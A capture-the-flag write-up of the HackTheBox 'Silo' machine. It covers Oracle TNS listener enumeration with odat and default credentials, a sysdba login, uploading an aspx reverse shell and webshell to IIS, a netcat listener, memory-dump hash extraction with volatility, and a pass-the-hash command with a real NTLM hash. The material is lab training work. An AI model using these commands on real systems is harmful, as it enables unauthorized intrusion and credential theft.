HackTheBox - Silo Writeup

# HackTheBox - Silo Writeup ###### tags: `writeup` `Silo` `Machine` `medium` `OSCP` `Volatility` `Oracle TNS Listener` ## :computer: Port Scanning ##### Nmap command ```bash nmap -sV -T4 -sS -v -sC -p- -oN Ports 10.10.10.82 ``` ```bash # Nmap 7.92 scan initiated Thu May 5 06:28:23 2022 as: nmap -sV -T4 -sS -v -sC -p- -oN Ports 10.10.10.82 Increasing send delay for 10.10.10.82 from 0 to 5 due to 2935 out of 7337 dropped probes since last increase. Increasing send delay for 10.10.10.82 from 5 to 10 due to 11 out of 19 dropped probes since last increase. Warning: 10.10.10.82 giving up on port because retransmission cap hit (6). Nmap scan report for 10.10.10.82 Host is up (0.068s latency). Not shown: 65520 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 |_http-title: IIS Windows Server |_http-server-header: Microsoft-IIS/8.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49159/tcp open oracle-tns Oracle TNS listener (requires service name) 49160/tcp open msrpc Microsoft Windows RPC 49161/tcp open msrpc Microsoft Windows RPC 49162/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 58s, deviation: 0s, median: 58s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-security-mode: | 3.0.2: |_ Message signing enabled but not required | smb2-time: | date: 2022-05-05T10:48:55 |_ start_date: 2022-05-05T10:23:23 Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu May 5 06:48:00 2022 -- 1 IP address (1 host up) scanned in 1177.15 seconds ``` We can see the a IIS server up and some strange Oracle TNS Listener let's search more about it. ## :eye: Enumeration The first thing i looked for was in [hacktricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener) and i founded some info about it, theres a tool callet odat that retrieves info about this port with one command. To see how to use it i enter the help command and we can see al the modules: ![](https://i.imgur.com/KazhV3G.png) In my case I launched the all option that autoenumerate the port bruteforcing for sids, accounts, passwords and if is vulnerable to some exploits. ```bash odat all -s 10.10.10.82 -p 1521 ``` After a few seconds i retrieved the necessary info to try to use other modules: ![](https://i.imgur.com/QppfESL.png) Now we know these things: - SID is **XE** - Username = **scott** - Password = **tiger** ## :bomb: Explotation ### TNS Listener Explotation Looking into the [wiki](https://github.com/quentinhardy/odat/wiki/all) page in the github odat tool I can see we can upload files to the IIS server so i tried the following command to upload a aspx reverse shell. ```bash odat dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:\inetpub\wwwroot\\" shell.aspx /tmp/shell.aspx ``` But i retrieved this error: ![](https://i.imgur.com/4PGx8lr.png) We see that we don't have enough privileges to upload it with the account that we obtained from de odat tool so after reading in **hacktricks** and looking for info I see that we can login as sysdba in the DB using sqlplus client from oracle with the following command: ```bash sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'; ``` ```bash sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba'; ``` After login into the db we have to create a user that has sysdba privileges to can upload files with odat without problems. I looked the syntax for it in this two webpages: - https://dba.stackexchange.com/questions/40562/creating-an-admin-user-in-oracle - https://www.oracletutorial.com/oracle-administration/oracle-create-user/ See the following image to see how i created it. ![](https://i.imgur.com/6Lky32x.png) Next to that we have to try to upload a file with the new account created using odat. I have ready an aspx reverse shell for the IIS server so I uploaded in the root directory of the web server. It is important besides uploading a reverse shell, to upload a webshell to be able to read the file below that has an encoding error and we can only read it properly if we load it from the [webshell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx). ![](https://i.imgur.com/iUuOFgt.png) ![](https://i.imgur.com/ldRGzdz.png) ```bash odat dbmsxslprocessor -s 10.10.10.82 -d XE -U pepe -P pepelu --putFile "c:\inetpub\wwwroot\\" shell2.aspx /tmp/shell.aspx ``` After upload it successfully, start a netcat listener and load the shell in the explorer. ```bash rlwrap nc -nlvp 8888 ``` ![](https://i.imgur.com/KjBjIzz.png) ![](https://i.imgur.com/VzTu5BW.png) With this we can look the user flag. ![](https://i.imgur.com/F98HIgC.png) --- ### ⏫Root Privesc Inside the User directory we can see the flag and a text file, let's read it. ![](https://i.imgur.com/Pug4tAU.png) To read properly the text read it from the webshell. ![](https://i.imgur.com/1yD3vcv.png) If we click the link we can access to a dropbox file protected by password, let's use the password in the text: ![](https://i.imgur.com/xcgNNnk.png) After write the password we can download this zip file: ![](https://i.imgur.com/fECEwIZ.png) Next we unzip it and we see a .dmg file, taking into account that the text file said that it was a memory dump we could use volatility3 to analyse it, but first we have to install it so I leave you this [link](https://seanthegeek.net/1172/how-to-install-volatility-2-and-volatility-3-on-debian-ubuntu-or-kali-linux/) as a guide for volatility3. Theres a lot of modules in volatility, but looking into the [guide](https://volatility3.readthedocs.io/en/latest/index.html) but i found one that we can use to dump the credential hashes, here's the command to use with the file. ```bash vol -f SILO-20180105-221806.dmp windows.hashdump ``` ![](https://i.imgur.com/yuX15I0.png) After That we received the stored hashes and with this, we can try to login with pass the hash. ```bash pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd.exe ``` After that we are going to be administrators and we can read the root flag. ![](https://i.imgur.com/QyOljyf.png) --- ### You can find me on: :bird:[**Twitter**](https://twitter.com/Aka_Mecanico) :desktop_computer: [**Github**](https://github.com/Mec4nico) :ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico) :green_book:[**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)